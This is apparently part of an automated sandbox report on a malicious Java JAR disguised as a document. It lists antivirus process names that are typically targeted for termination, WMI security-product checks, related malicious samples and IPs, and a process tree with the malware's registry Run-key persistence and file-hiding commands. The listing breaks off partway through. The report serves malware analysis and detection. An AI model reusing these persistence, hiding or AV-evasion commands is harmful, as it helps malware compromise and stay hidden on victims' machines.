Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)

Show sources

Source: java.exe, javaw.exe	Binary or memory string: K7TSMngr.exe
Source: java.exe, javaw.exe	Binary or memory string: SCANWSCS.EXE
Source: java.exe, javaw.exe	Binary or memory string: FSMA32.EXE
Source: java.exe, javaw.exe	Binary or memory string: K7PSSrvc.exe
Source: java.exe, javaw.exe	Binary or memory string: SBAMSvc.exe
Source: java.exe, javaw.exe	Binary or memory string: procexp.exe
Source: java.exe, javaw.exe	Binary or memory string: FPWin.exe
Source: java.exe, javaw.exe	Binary or memory string: MSASCui.exe
Source: java.exe, javaw.exe	Binary or memory string: QUHLPSVC.EXE
Source: java.exe, javaw.exe	Binary or memory string: wireshark.exe
Source: java.exe, javaw.exe	Binary or memory string: EMLPROXY.EXE
Source: java.exe, javaw.exe	Binary or memory string: BullGuard.exe
Source: java.exe, javaw.exe	Binary or memory string: guardxservice.exe
Source: java.exe, javaw.exe	Binary or memory string: acs.exe
Source: java.exe, javaw.exe	Binary or memory string: K7TSecurity.exe
Source: java.exe, javaw.exe	Binary or memory string: FProtTray.exe
Source: java.exe, javaw.exe	Binary or memory string: op_mon.exe
Source: java.exe, javaw.exe	Binary or memory string: AVKService.exe
Source: java.exe, javaw.exe	Binary or memory string: fsgk32.exe
Source: java.exe, javaw.exe	Binary or memory string: virusutilities.exe
Source: java.exe, javaw.exe	Binary or memory string: FPAVServer.exe
Source: java.exe, javaw.exe	Binary or memory string: K7RTScan.exe
Source: java.exe, javaw.exe	Binary or memory string: cmdagent.exe
Source: java.exe, javaw.exe	Binary or memory string: ONLINENT.EXE
Source: java.exe, javaw.exe	Binary or memory string: SUPERAntiSpyware.exe
Source: java.exe, javaw.exe	Binary or memory string: MsMpEng.exe
Source: java.exe, javaw.exe	Binary or memory string: AVKTray.exe
Source: java.exe, javaw.exe	Binary or memory string: ClamTray.exe
Source: java.exe, javaw.exe	Binary or memory string: K7EmlPxy.EXE
Source: java.exe, javaw.exe	Binary or memory string: ClamWin.exe
Source: java.exe, javaw.exe	Binary or memory string: FSM32.EXE
Source: java.exe, javaw.exe	Binary or memory string: SBAMTray.exe
Source: java.exe, javaw.exe	Binary or memory string: K7FWSrvc.exe
Source: java.exe, javaw.exe	Binary or memory string: mbam.exe
Source: java.exe, javaw.exe	Binary or memory string: AVKProxy.exe
Source: java.exe, javaw.exe	Binary or memory string: FilMsg.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Show sources

Source: C:\Windows\System32\cscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * from AntiVirusProduct
Source: C:\Windows\System32\cscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * from FirewallProduct
Source: C:\Windows\System32\cscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * from AntiVirusProduct
Source: C:\Windows\System32\cscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * from FirewallProduct
Source: C:\Windows\System32\cscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * from AntiVirusProduct
Source: C:\Windows\System32\cscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * from AntiVirusProduct
Source: C:\Windows\System32\cscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * from FirewallProduct
Source: C:\Windows\System32\cscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * from FirewallProduct

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Show sources

Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Queries time zone information

Show sources

Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe

Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation DynamicDaylightTimeDisabled

Behavior Graph

Simulations

Behavior and APIs

No simulations

Antivirus Detection

Initial Sample

Source	Ratio	Cloud	Link
75Doc 0.26777400 15041397050000000jpg.jar	0/60	virustotal	Browse

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
178.175.138.167	48TF0.35221400 1503901324.jar	cff8d3f23ff2e75e0fc0f3e0cdf15a938936d105eafbb42f2219d2ba90185854	malicious	Browse
	75Doc 0.26777400 15041397050000000jpg.jar	9a56b122765ef5c96b8a1cc29d65d2e906ff0d805246755323462d6ddb3ca6a5	malicious	Browse
	27TF0.35221400 1503901324.jar	cff8d3f23ff2e75e0fc0f3e0cdf15a938936d105eafbb42f2219d2ba90185854	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ICSTrabia-NetworkSRL	42Order Sample Picture.exe	b4076c7beba798e44a695bc5252255c4bcce0a8854acef2d839907e8d6e6a620	malicious	Browse	178.175.138.137
	73Doc Bidding Tender PO-211411.jar	5bab68a60dcc1752510997e1e3d9a5cae7be6623ea223c66b5029a598640c50c	malicious	Browse	178.175.138.147
	2565000USD.exe	a58471c5dd9e10e469032b2a9d7b461b139961bd88f5899c04abff95a227c6f2	malicious	Browse	178.175.138.209
	2565000USD.exe	a58471c5dd9e10e469032b2a9d7b461b139961bd88f5899c04abff95a227c6f2	malicious	Browse	178.175.138.209
	89CV.jar	8acccee38b0c5f38906561ebffea1d3320bfcd1543bea943fa99794d1cd7cc4f	malicious	Browse	178.175.138.208
	48TF0.35221400 1503901324.jar	cff8d3f23ff2e75e0fc0f3e0cdf15a938936d105eafbb42f2219d2ba90185854	malicious	Browse	178.175.138.167
	79payment of Invoices.jar	2e8d90642015fd38608bae8407cc4c109668977b5db4b1baac510026b36a4cbc	malicious	Browse	178.175.138.150
	64scan copy0302017686 (1).exe	c7cc4ac7fb0eebf95013224630b04d2ba2280741debc8cf225c7bedc3bfef61f	malicious	Browse	178.175.138.146
	63scan copy0302017686 (2).exe	12c38d1cd058c40a00c661b5569e9baccd5670a353c823b7e835cb02c3ad51e2	malicious	Browse	178.175.138.146
	DHL Documents 7.exe	2431b175e9ea75b884632f194e5120d5e4b3cc8ac05d522d1873dea692f9aa25	malicious	Browse	178.175.138.225
	47fourthcoming project supply target doc.jar	e9278c695e4996ee52901e5a522c7d07ed23776615972c8b3dd50881c3128032	malicious	Browse	178.175.138.147
	43IMG-PAYMENT ADVICE,PDF.jar	f02d924ef95f69e1e102dbbf6c3ab78b36d6892f4d4c3bdb0f31c37d631a89bc	malicious	Browse	178.175.138.213
	37Scan 908-000100000100101010101010000.jar	7afb230fd764f483695dd8351acb3f56efb875d8d40798437e7ae2afaaa54d9b	malicious	Browse	178.175.138.200
	12FTT_LC0706217.jar	16a8b5b3b896817d285c7abab2010425cfa524c4c9acccfcd115c818a5f89125	malicious	Browse	178.175.138.211
	63Scan 908-000100000100101010101010000.jar	7afb230fd764f483695dd8351acb3f56efb875d8d40798437e7ae2afaaa54d9b	malicious	Browse	178.175.138.200
	75Doc 0.26777400 15041397050000000jpg.jar	9a56b122765ef5c96b8a1cc29d65d2e906ff0d805246755323462d6ddb3ca6a5	malicious	Browse	178.175.138.167
	27TF0.35221400 1503901324.jar	cff8d3f23ff2e75e0fc0f3e0cdf15a938936d105eafbb42f2219d2ba90185854	malicious	Browse	178.175.138.167
	47fourthcoming project supply target doc.jar	e9278c695e4996ee52901e5a522c7d07ed23776615972c8b3dd50881c3128032	malicious	Browse	178.175.138.147
	73Doc Bidding Tender PO-211411.jar	5bab68a60dcc1752510997e1e3d9a5cae7be6623ea223c66b5029a598640c50c	malicious	Browse	178.175.138.147

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\LUKETA~1\AppData\Local\Temp\MNGxsiYGqJ1567205061684017956.reg	21payment details.jar	a09b0ab84a65269c36272a32921937527990010b95a85f3a0634bc1d1bd1e987	malicious	Browse
	46Order Specification.jar	c3f6672c76f4c0bf73b12f83b268aa6c371eb3c25673c203a4d1382a6a7cf31f	malicious	Browse
	89CV.jar	8acccee38b0c5f38906561ebffea1d3320bfcd1543bea943fa99794d1cd7cc4f	malicious	Browse
	136ATO Payment Slip.jar	e6cae2a5bedaa9f9a6ba74eb373db03c7cf251a61c27e060f142f8a9739f4c1d	malicious	Browse
	67Profoma Invoice 17-05-2017.jar	8a4330850fb927e8e69b28f648f510bac3484ed996e601259d50344fd7d4dd69	malicious	Browse
	26PO68747.pdf.jar	6dfc3eafd74d835fe8245b7772a3f1dd54bdc6e0260815fc735318e310507e1f	malicious	Browse
	5Quotation08072017.jar	5db3676209fc460361aea01af9c6d4e405c2e9f6277c67589fa49901e915a247	malicious	Browse
	17Annex Quote jpg.jar	ce942ec89f424cebd908d9a090398bbd426ddad16028b5ca251a41b54028a910	malicious	Browse
	110.39300900 1498515485.jar	90b8fa98fe6650ec2f378961cfd57cb9f2db2136140681e488a74ef3fac62a79	malicious	Browse
	69FRESH INQUIRY ORDER No3308.jar	bdbf31180c4194f1a0e16bece64c1478a94a33bcd66488b2702e3775e6577ab3	malicious	Browse
	59Telex Advice.jar	ecf17d6af32dcaff1538ba5447985d104783aed061ab7b265aaf2fed40b54414	malicious	Browse
	75Wire Copy.jar	827c5ed2011610ddaed7fc757341b14d7ac5a7e7f31715c878b3444b31d856c1	malicious	Browse
	73payment slip.jar	46fa4f123b9d2661af970416a6c0b717e20f1a09c709b8038643df20620226c3	malicious	Browse
	63New Order-pdf.jar	4d08bf47cdc5d60f4c92e0f2f1685bbb5ae57286232482afa7e4c828a07e95e9	malicious	Browse
	43New Order 0.73442600 1503372304jpg.jar	93a65810ca6e7508a5a8fd5a3c5b04f87bdd2f88971dfa8e3552629fe6678a44	malicious	Browse
	48TF0.35221400 1503901324.jar	cff8d3f23ff2e75e0fc0f3e0cdf15a938936d105eafbb42f2219d2ba90185854	malicious	Browse
	45request for quotation.jar	177d1b7c69ef209e2b77a412c5ccf68debe8ed7dacd03307b6af6ae514fa3c8e	malicious	Browse
	33invoice.jar	3a8261643b17b4dfb21146703f772d15617b86e0439b655863452a8e0a6d2b82	malicious	Browse
	57PI 0.83762800 1504076647.jar	04900517eeddc58fbf04f515977dfbb539d7f5d199444ebe3365513e42d36c49	malicious	Browse
	35Purchase order 2017.jar	fdef91460ae84d5033b4154e3296b39a3eb881d1bb0e6f8bcbae9f17dcf2d59b	malicious	Browse
C:\Users\LUKETA~1\AppData\Local\Temp\Retrive194914766236682624.vbs	97PO#42869051-2017.jar	2ee8dc8c4f3bd91c280158da1df45fbc371fa4c2c799f3aadf7a31ea62b91991	malicious	Browse
	25New Order.jar	6dd7e4306bf105e9208151b587a99f0e917605d29a752af8adac7b97f041493c	malicious	Browse
	31NEW ORDER.jar	0d93e7a92a6d975e36247218b554bfe72e519d8a973bc792aa337c7760d400a0	malicious	Browse
	49scan_201717067354367.jar	0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bd	malicious	Browse
	82BANK SLIP.jar	c4cba91e87fddda64ecd5a34345bcc4041460099ebbf0e12ce388aad54ae9dde	malicious	Browse
	31047987600 1491174183.xls.jar	973575e6f9b3344b291d8b27bc6ae1a904efe91667b2231e15ef78614dd64886	malicious	Browse
	73Doc Bidding Tender PO-211411.jar	5bab68a60dcc1752510997e1e3d9a5cae7be6623ea223c66b5029a598640c50c	malicious	Browse
	74Profoma Invoice pdf copy.jar	c512fd4a2cfeae199fe87b63eb409d657bab16dd54afeb28f56ee0c1f1c38510	malicious	Browse
	74Profoma Invoice pdf copy.jar	c512fd4a2cfeae199fe87b63eb409d657bab16dd54afeb28f56ee0c1f1c38510	malicious	Browse
	60pic_ Outstanding & details_pdf_pdf.jar	9d0cbc6e17fdeaa7fbc14e8ac2ef82443648d3695964dd341625adc046f2bdb1	malicious	Browse
	1TT_COPY_A2017030255.jpg.jar	0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bd	malicious	Browse
	21payment details.jar	a09b0ab84a65269c36272a32921937527990010b95a85f3a0634bc1d1bd1e987	malicious	Browse
	97Payment-pdf.jar	ff860260e27631332f95ff653243f05d791208540afeb3e7a46bcb31b6462fcf	malicious	Browse
	95April PO.jar	1b1dcfc915840c54c876591314c50a47bd4b012c1c8a75c49a892f4a9ca813dc	malicious	Browse
	69AWBRef38304003993.pdf.jar	83d655b68632215cd32af6bd6a6b44aec16709daa9e2009b99a60cdb45c333e1	malicious	Browse
	98SWIFT.jar	92797129f3e958c2fbe33387e751185d2ce58aa5ff0baf59a420717b68070d5f	malicious	Browse
	93NEW_INVOICE_ORDER_0948776633.jar	14bb1fdc161af6b58b6bef32f91f065bbffcde6b01c6a5a0dc1b4f6eb433fec8	malicious	Browse
	45Inquiry No. (12157) PI from threeway 1214.jar	a6995b8c377aa017dc8b2775dd50bb986f4b473bd88238ba27f5130c7244bd9f	malicious	Browse
	46Order Specification.jar	c3f6672c76f4c0bf73b12f83b268aa6c371eb3c25673c203a4d1382a6a7cf31f	malicious	Browse
	23Inquiry No. (12157) PI from threeway 1214.jar	1dd4c6d78976171016e530ebc8f98ccff520d21a6428b96f0cec9977ba8f5e30	malicious	Browse
C:\Users\LUKETA~1\AppData\Local\Temp\Retrive2520289818372255555.vbs	97PO#42869051-2017.jar	2ee8dc8c4f3bd91c280158da1df45fbc371fa4c2c799f3aadf7a31ea62b91991	malicious	Browse
	25New Order.jar	6dd7e4306bf105e9208151b587a99f0e917605d29a752af8adac7b97f041493c	malicious	Browse
	31NEW ORDER.jar	0d93e7a92a6d975e36247218b554bfe72e519d8a973bc792aa337c7760d400a0	malicious	Browse
	49scan_201717067354367.jar	0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bd	malicious	Browse
	82BANK SLIP.jar	c4cba91e87fddda64ecd5a34345bcc4041460099ebbf0e12ce388aad54ae9dde	malicious	Browse
	31047987600 1491174183.xls.jar	973575e6f9b3344b291d8b27bc6ae1a904efe91667b2231e15ef78614dd64886	malicious	Browse
	73Doc Bidding Tender PO-211411.jar	5bab68a60dcc1752510997e1e3d9a5cae7be6623ea223c66b5029a598640c50c	malicious	Browse
	74Profoma Invoice pdf copy.jar	c512fd4a2cfeae199fe87b63eb409d657bab16dd54afeb28f56ee0c1f1c38510	malicious	Browse
	74Profoma Invoice pdf copy.jar	c512fd4a2cfeae199fe87b63eb409d657bab16dd54afeb28f56ee0c1f1c38510	malicious	Browse
	60pic_ Outstanding & details_pdf_pdf.jar	9d0cbc6e17fdeaa7fbc14e8ac2ef82443648d3695964dd341625adc046f2bdb1	malicious	Browse
	1TT_COPY_A2017030255.jpg.jar	0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bd	malicious	Browse
	21payment details.jar	a09b0ab84a65269c36272a32921937527990010b95a85f3a0634bc1d1bd1e987	malicious	Browse
	97Payment-pdf.jar	ff860260e27631332f95ff653243f05d791208540afeb3e7a46bcb31b6462fcf	malicious	Browse
	95April PO.jar	1b1dcfc915840c54c876591314c50a47bd4b012c1c8a75c49a892f4a9ca813dc	malicious	Browse
	69AWBRef38304003993.pdf.jar	83d655b68632215cd32af6bd6a6b44aec16709daa9e2009b99a60cdb45c333e1	malicious	Browse
	98SWIFT.jar	92797129f3e958c2fbe33387e751185d2ce58aa5ff0baf59a420717b68070d5f	malicious	Browse
	93NEW_INVOICE_ORDER_0948776633.jar	14bb1fdc161af6b58b6bef32f91f065bbffcde6b01c6a5a0dc1b4f6eb433fec8	malicious	Browse
	45Inquiry No. (12157) PI from threeway 1214.jar	a6995b8c377aa017dc8b2775dd50bb986f4b473bd88238ba27f5130c7244bd9f	malicious	Browse
	46Order Specification.jar	c3f6672c76f4c0bf73b12f83b268aa6c371eb3c25673c203a4d1382a6a7cf31f	malicious	Browse
	23Inquiry No. (12157) PI from threeway 1214.jar	1dd4c6d78976171016e530ebc8f98ccff520d21a6428b96f0cec9977ba8f5e30	malicious	Browse
C:\Users\LUKETA~1\AppData\Local\Temp\Retrive2857528709846908978.vbs	97PO#42869051-2017.jar	2ee8dc8c4f3bd91c280158da1df45fbc371fa4c2c799f3aadf7a31ea62b91991	malicious	Browse
	25New Order.jar	6dd7e4306bf105e9208151b587a99f0e917605d29a752af8adac7b97f041493c	malicious	Browse
	31NEW ORDER.jar	0d93e7a92a6d975e36247218b554bfe72e519d8a973bc792aa337c7760d400a0	malicious	Browse
	49scan_201717067354367.jar	0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bd	malicious	Browse
	82BANK SLIP.jar	c4cba91e87fddda64ecd5a34345bcc4041460099ebbf0e12ce388aad54ae9dde	malicious	Browse
	31047987600 1491174183.xls.jar	973575e6f9b3344b291d8b27bc6ae1a904efe91667b2231e15ef78614dd64886	malicious	Browse
	73Doc Bidding Tender PO-211411.jar	5bab68a60dcc1752510997e1e3d9a5cae7be6623ea223c66b5029a598640c50c	malicious	Browse
	74Profoma Invoice pdf copy.jar	c512fd4a2cfeae199fe87b63eb409d657bab16dd54afeb28f56ee0c1f1c38510	malicious	Browse
	74Profoma Invoice pdf copy.jar	c512fd4a2cfeae199fe87b63eb409d657bab16dd54afeb28f56ee0c1f1c38510	malicious	Browse
	60pic_ Outstanding & details_pdf_pdf.jar	9d0cbc6e17fdeaa7fbc14e8ac2ef82443648d3695964dd341625adc046f2bdb1	malicious	Browse
	1TT_COPY_A2017030255.jpg.jar	0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bd	malicious	Browse
	21payment details.jar	a09b0ab84a65269c36272a32921937527990010b95a85f3a0634bc1d1bd1e987	malicious	Browse
	97Payment-pdf.jar	ff860260e27631332f95ff653243f05d791208540afeb3e7a46bcb31b6462fcf	malicious	Browse
	95April PO.jar	1b1dcfc915840c54c876591314c50a47bd4b012c1c8a75c49a892f4a9ca813dc	malicious	Browse
	69AWBRef38304003993.pdf.jar	83d655b68632215cd32af6bd6a6b44aec16709daa9e2009b99a60cdb45c333e1	malicious	Browse
	98SWIFT.jar	92797129f3e958c2fbe33387e751185d2ce58aa5ff0baf59a420717b68070d5f	malicious	Browse
	93NEW_INVOICE_ORDER_0948776633.jar	14bb1fdc161af6b58b6bef32f91f065bbffcde6b01c6a5a0dc1b4f6eb433fec8	malicious	Browse
	45Inquiry No. (12157) PI from threeway 1214.jar	a6995b8c377aa017dc8b2775dd50bb986f4b473bd88238ba27f5130c7244bd9f	malicious	Browse
	46Order Specification.jar	c3f6672c76f4c0bf73b12f83b268aa6c371eb3c25673c203a4d1382a6a7cf31f	malicious	Browse
	23Inquiry No. (12157) PI from threeway 1214.jar	1dd4c6d78976171016e530ebc8f98ccff520d21a6428b96f0cec9977ba8f5e30	malicious	Browse

Screenshot

Startup

system is w7_1

cmd.exe (PID: 3256 cmdline: C:\Windows\system32\cmd.exe /c 7za.exe x -y -oC:\jar 'C:\Users\user\Desktop\75Doc 0.26777400 15041397050000000jpg.jar' MD5: AD7B9C14083B52BC532FBA5948342B98)

7za.exe (PID: 3264 cmdline: 7za.exe x -y -oC:\jar 'C:\Users\user\Desktop\75Doc 0.26777400 15041397050000000jpg.jar' MD5: 42BADC1D2F03A8B1E4875740D3D49336)

cmd.exe (PID: 3324 cmdline: 'C:\Windows\System32\cmd.exe' /c java.exe -jar 'C:\Users\user\Desktop\75Doc 0.26777400 15041397050000000jpg.jar' OnayiZufuhugu.OgiyizEfahiGu.Main >> C:\cmdlinestart.log 2>&1 MD5: AD7B9C14083B52BC532FBA5948342B98)

java.exe (PID: 3348 cmdline: java.exe -jar 'C:\Users\user\Desktop\75Doc 0.26777400 15041397050000000jpg.jar' OnayiZufuhugu.OgiyizEfahiGu.Main MD5: 6F4EB294ACF731771AFE3EF6F7EE812D)

java.exe (PID: 3396 cmdline: 'C:\Program Files\Java\jre1.8.0_40\bin\java.exe' -jar C:\Users\LUKETA~1\AppData\Local\Temp\_0.4312212827200392546983382786626386.class MD5: 6F4EB294ACF731771AFE3EF6F7EE812D)

cmd.exe (PID: 3592 cmdline: cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive3159448250120760692.vbs MD5: AD7B9C14083B52BC532FBA5948342B98)

cscript.exe (PID: 3608 cmdline: cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive3159448250120760692.vbs MD5: A3A35EE79C64A640152B3113E6E254E2)

cmd.exe (PID: 3648 cmdline: cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive8817309470254096997.vbs MD5: AD7B9C14083B52BC532FBA5948342B98)

cscript.exe (PID: 3660 cmdline: cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive8817309470254096997.vbs MD5: A3A35EE79C64A640152B3113E6E254E2)

cmd.exe (PID: 3708 cmdline: cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)

cmd.exe (PID: 3468 cmdline: cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive2520289818372255555.vbs MD5: AD7B9C14083B52BC532FBA5948342B98)

cscript.exe (PID: 3476 cmdline: cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive2520289818372255555.vbs MD5: A3A35EE79C64A640152B3113E6E254E2)

cmd.exe (PID: 3528 cmdline: cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive194914766236682624.vbs MD5: AD7B9C14083B52BC532FBA5948342B98)

cscript.exe (PID: 3536 cmdline: cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive194914766236682624.vbs MD5: A3A35EE79C64A640152B3113E6E254E2)

xcopy.exe (PID: 3600 cmdline: xcopy 'C:\Program Files\Java\jre1.8.0_40' 'C:\Users\user\AppData\Roaming\Oracle\' /e MD5: 361D273773994ED11A6F1E51BBB4277E)

cmd.exe (PID: 3792 cmdline: cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)

reg.exe (PID: 3800 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GboKDMbfKti /t REG_EXPAND_SZ /d '\'C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe\' -jar \'C:\Users\user\eDdlsoVKfgW\AknzQIkoyKh.qmSBQy\'' /f MD5: D69A9ABBB0D795F21995C2F48C1EB560)

attrib.exe (PID: 3808 cmdline: attrib +h 'C:\Users\user\eDdlsoVKfgW\*.*' MD5: 459A5755AFBB1CB3E67CA4C1296599E3)

attrib.exe (PID: 3816 cmdline: attrib +h 'C:\Users\user\eDdlsoVKfgW' MD5: 459A5755AFBB1CB3E67CA4C1296599E3)

javaw.exe (PID: 3824 cmdline: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\user\eDdlsoVKfgW\AknzQIkoyKh.qmSBQy MD5: C731C96456335BDAA2F58220AE25A202)

java.exe (PID: 3884 cmdline: C:\Users\user\AppData\Roaming\Oracle\bin\java.exe -jar C:\Users\LUKETA~1\AppData\Local\Temp\_0.94322696032766358809744035144248591.class MD5: 6F4EB294ACF731771AFE3EF6F7EE812D)

cmd.exe (PID: 4052 cmdline: cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive6418174406144645399.vbs MD5: AD7B9C14083B52BC532FBA5948342B98)

cscript.exe (PID: 4092 cmdline: cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive6418174406144645399.vbs MD5: A3A35EE79C64A640152B3113E6E254E2)

cmd.exe (PID: 1964 cmdline: cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive2857528709846908978.vbs MD5: AD7B9C14083B52BC532FBA5948342B98)

cscript.exe (PID: 2056 cmdline: cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive2857528709846908978.vbs MD5: A3A35EE79C64A640152B3113E6E254E2)

cmd.exe (PID: 3972 cmdline: cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive6799039488535261462.vbs MD5: AD7B9C14083B52BC532FBA5948342B98)

cscript.exe (PID: 4004 cmdline: cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive6799039488535261462.vbs MD5: A3A35EE79C64A640152B3113E6E254E2)

cmd.exe (PID: 1780 cmdline: cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive3450254285310729085.vbs MD5: AD7B9C14083B52BC532FBA5948342B98)

cscript.exe (PID: 2196 cmdline: cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive3450254285310729085.vbs MD5: A3A35EE79C64A640152B3113E6E254E2)

cmd.exe (PID: 1656 cmdline: cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Created / dropped Files

Download Dropped Binaries:	Dropped Binaries

C:\Users\LUKETA~1\AppData\Local\Temp\MNGxsiYGqJ1567205061684017956.reg
File Type:	ASCII text, with CRLF line terminators
MD5:	7F97F5F336944D427C03CC730C636B8F
SHA1:	8A50C72B4580C20D4A7BFC7AF8F12671BF6715AE
SHA-256:	9613CAED306E9A267C62C56506985EF99EA2BEE6E11AFC185B8133DDA37CBC57
SHA-512:	8F8B5DC16F087BDC73A134B76FD1063765E3C049BACA4873D1B9EB30BA59F418395490CAFC78A93B1CDCC20461E73C96DE34475669715D6DDB93D0B56E6E6C54
Malicious:	false

C:\Users\LUKETA~1\AppData\Local\Temp\Retrive194914766236682624.vbs
File Type:	ASCII text, with CRLF line terminators
MD5:	A32C109297ED1CA155598CD295C26611
SHA1:	DC4A1FDBAAD15DDD6FE22D3907C6B03727B71510
SHA-256:	45BFE34AA3EF932F75101246EB53D032F5E7CF6D1F5B4E495334955A255F32E7
SHA-512:	70372552DC86FE02ECE9FE3B7721463F80BE07A34126B2C75B41E30078CDA9E90744C7D644DF623F63D4FB985482E345B3351C4D3DA873162152C67FC6ECC887
Malicious:	false

C:\Users\LUKETA~1\AppData\Local\Temp\Retrive2520289818372255555.vbs
File Type:	ASCII text, with CRLF line terminators
MD5:	3BDFD33017806B85949B6FAA7D4B98E4
SHA1:	F92844FEE69EF98DB6E68931ADFAA9A0A0F8CE66
SHA-256:	9DA575DD2D5B7C1E9BAB8B51A16CDE457B3371C6DCDB0537356CF1497FA868F6
SHA-512:	AE5E5686AE71EDEF53E71CD842CB6799E4383B9C238A5C361B81647EFA128D2FEDF3BF464997771B5B0C47A058FECAE7829AEEDCD098C80A11008581E5781429
Malicious:	false

C:\Users\LUKETA~1\AppData\Local\Temp\Retrive2857528709846908978.vbs
File Type:	ASCII text, with CRLF line terminators
MD5:	A32C109297ED1CA155598CD295C26611
SHA1:	DC4A1FDBAAD15DDD6FE22D3907C6B03727B71510
SHA-256:	45BFE34AA3EF932F75101246EB53D032F5E7CF6D1F5B4E495334955A255F32E7
SHA-512:	70372552DC86FE02ECE9FE3B7721463F80BE07A34126B2C75B41E30078CDA9E90744C7D644DF623F63D4FB985482E345B3351C4D3DA873162152C67FC6ECC887
Malicious:	false

C:\Users\LUKETA~1\AppData\Local\Temp\Retrive3159448250120760692.vbs
File Type:	ASCII text, with CRLF line terminators
MD5:	3BDFD33017806B85949B6FAA7D4B98E4
SHA1:	F92844FEE69EF98DB6E68931ADFAA9A0A0F8CE66
SHA-256:	9DA575DD2D5B7C1E9BAB8B51A16CDE457B3371C6DCDB0537356CF1497FA868F6
SHA-512:	AE5E5686AE71EDEF53E71CD842CB6799E4383B9C238A5C361B81647EFA128D2FEDF3BF464997771B5B0C47A058FECAE7829AEEDCD098C80A11008581E5781429
Malicious:	false

C:\Users\LUKETA~1\AppData\Local\Temp\Retrive3450254285310729085.vbs
File Type:	ASCII text, with CRLF line terminators
MD5:	A32C109297ED1CA155598CD295C26611
SHA1:	DC4A1FDBAAD15DDD6FE22D3907C6B03727B71510
SHA-256:	45BFE34AA3EF932F75101246EB53D032F5E7CF6D1F5B4E495334955A255F32E7
SHA-512:	70372552DC86FE02ECE9FE3B7721463F80BE07A34126B2C75B41E30078CDA9E90744C7D644DF623F63D4FB985482E345B3351C4D3DA873162152C67FC6ECC887
Malicious:	false

C:\Users\LUKETA~1\AppData\Local\Temp\Retrive6418174406144645399.vbs
File Type:	ASCII text, with CRLF line terminators
MD5:	3BDFD33017806B85949B6FAA7D4B98E4
